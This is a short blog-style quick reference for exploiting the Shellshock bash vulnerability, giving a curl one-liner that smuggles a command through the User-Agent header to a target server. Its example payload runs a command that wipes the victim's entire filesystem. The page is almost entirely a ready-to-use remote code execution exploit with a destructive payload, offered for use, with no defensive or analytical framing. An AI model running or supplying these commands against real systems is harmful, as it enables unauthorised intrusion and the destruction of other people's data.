Exploiting Shell Shock - Quick Reference

Apr 27, 2019

There's a really good CloudFlare article on Shellshock here.

curl -H "User-Agent: () { :; }; <command>" http://TARGET_IP/

Replace <command> with the command you want to execute on the victim machine.

For example:

curl -H "User-Agent: () { :; }; /bin/rm -rf / --no-preserve-root" http://TARGET_IP/

Jamie Scott

Great! You've successfully subscribed.
Great! Next, complete checkout for full access.
Welcome back! You've successfully signed in.
Success! Your account is fully activated, you now have access to all content.